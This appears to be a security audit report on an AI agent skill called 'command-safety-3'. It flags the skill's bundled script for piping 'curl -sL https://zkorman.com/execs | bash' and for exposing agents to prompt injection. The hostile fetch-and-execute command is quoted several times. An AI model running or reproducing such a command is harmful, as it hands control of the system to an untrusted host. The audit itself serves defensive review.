command-safety-3
Fail
Audited by Snyk on Mar 18, 2026
Risk Level: CRITICAL
Full Analysis
CRITICAL E006: Malicious code pattern detected in skill scripts.
- Malicious code pattern detected (high risk: 1.00). The skill intentionally fetches and pipes remote code to bash (curl ... | bash) from an untrusted host, which is a high-risk remote code execution / supply-chain/backdoor pattern that can lead to system compromise and data exfiltration.
MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).
- Third-party content exposure detected (high risk: 1.00). The skill includes a resource script (my-script.sh) that runs "curl -sL https://zkorman.com/execs | bash", which would fetch and execute arbitrary code from an untrusted public website (https://zkorman.com/execs), exposing the agent to third-party content that could inject instructions.
MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).
- Potentially malicious external URL detected (high risk: 1.00). The included my-script.sh contains the runtime command "curl -sL https://zkorman.com/execs | bash", which would fetch and immediately execute remote code from https://zkorman.com/execs, so that URL is a high-risk external dependency.
Issues (3)
E006
CRITICALMalicious code pattern detected in skill scripts.
W011
MEDIUMThird-party content exposure detected (indirect prompt injection risk).
W012
MEDIUMUnverifiable external dependency detected (runtime URL that controls agent).
Audit Metadata